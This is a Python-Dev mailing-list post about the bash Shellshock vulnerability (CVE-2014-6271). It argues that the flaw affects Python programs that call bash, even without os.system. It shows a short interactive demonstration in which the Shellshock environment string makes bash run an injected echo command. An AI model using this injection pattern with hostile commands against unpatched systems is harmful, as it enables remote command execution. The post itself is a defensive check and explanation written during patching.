[Python-Dev] Critical bash vulnerability CVE-2014-6271 may affect Python on *n*x and OSX

[Chris Angelico]

On Fri, Sep 26, 2014 at 9:53 AM, Antoine Pitrou <solipsis at pitrou.net> wrote:
>> In other words, os.system is *already* an attack vector, unless you only
>> use it with trusted strings. I don't think the bash env vulnerability
>> adds to the attack surface.
>>
>> Have I missed something?
>
> The part where the attack payload is passed through the environment, not
> through hypothetical user-injected command-line arguments.

Which means this also affects anything that invokes shell scripts (if
they use bash, rather than sh), even if it doesn't use os.system().
I'm just in process of checking and patching my systems (most of them
are just 'apt-get update; apt-get upgrade' followed by a quick check),
and can confirm that it does happen in Python. All you have to do is
invoke bash, either explicitly or through your target's shebang.

>>> import os, subprocess
>>> os.environ["HAHA"]="() { :;}; echo This is crafted from the environment."
>>> subprocess.call(["./test.sh"])
This is crafted from the environment.
This is from my test script.
0
>>> open("./test.sh").read()
'#!/bin/bash\necho This is from my test script.\n\n'
>>> subprocess.call(["bash","-c","echo This is from the command line."])
This is crafted from the environment.
This is from the command line.
0

But this is a bash issue, not a Python one.

ChrisA